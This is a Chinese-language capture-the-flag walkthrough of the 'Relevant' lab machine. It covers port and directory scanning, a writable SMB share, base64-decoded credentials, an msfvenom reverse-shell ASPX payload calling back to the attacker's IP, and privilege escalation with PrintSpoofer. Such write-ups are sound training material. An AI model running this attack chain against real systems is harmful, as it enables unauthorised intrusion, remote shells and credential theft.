Relevant-thm

1.nmap扫端口

不仅常规端口,最好扫全端口

sudo nmap -sS -sV -T5 -p- IP

2.有80,gobuster扫目录

没扫出有价值的

gobuster dir -u http://10.10.148.42:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,301' --no-error -t 50 --status-codes ""

3.smbmap扫共享。

sudo smbmap -H ip -p 445

IPC$ READ ONLY Remote IPC
nt4wrksv READ, WRITE

4.smbclient连接可读可写的nt4wrksv文件夹

smbclient //10.10.108.115/nt4wrksv

连接上后,查看共享文件夹存在的文件,然后发现一个敏感文件,使用

get 文件名 下载下来

经过Base64解密,字符串 “Qm9iIC0gIVBAJCRXMHJEITEyMw==” 解码为 “Bob – !@#$%^&*123“.

经过Base64解密,字符串 “QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk” 解码为 “Bill – Juw4nnAmN4n420696969!!$$“.

既然这个文件夹是可读可写,那么可以传shell到这

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.64.63 LPORT=4444 -f aspx > related.aspx

使用 put filename 命令传shell

开监听器。curl http://10.10.77.239:49663/nt4wrksv/related.aspx

关键是选对payload


下图是监听成功


提权

1.

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 尝试查看历史命令,可惜没有

2.cmdkey /list 查看保存的凭据,可惜没有

3.根据安装的 IIS 版本,我们可以在以下位置之一找到 web.config,在第二个路径找到了想要找到的东西。

  • C:\inetpub\wwwroot\web.config
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

4. 查看数据库连接字符串

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString 下面是找到的结果

<add connectionStringName=”LocalSqlServer” maxEventDetailsLength=”1073741823
没啥用处

5.输入 whoami /priv

SeImpersonatePrivilege 能模拟认证后的用户

网上搜利用方式,从github上找printspoofer64.exe上传到共享,然后运行命令执行 printspoofer64.exe -i -c cmd

确实提权成功了

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注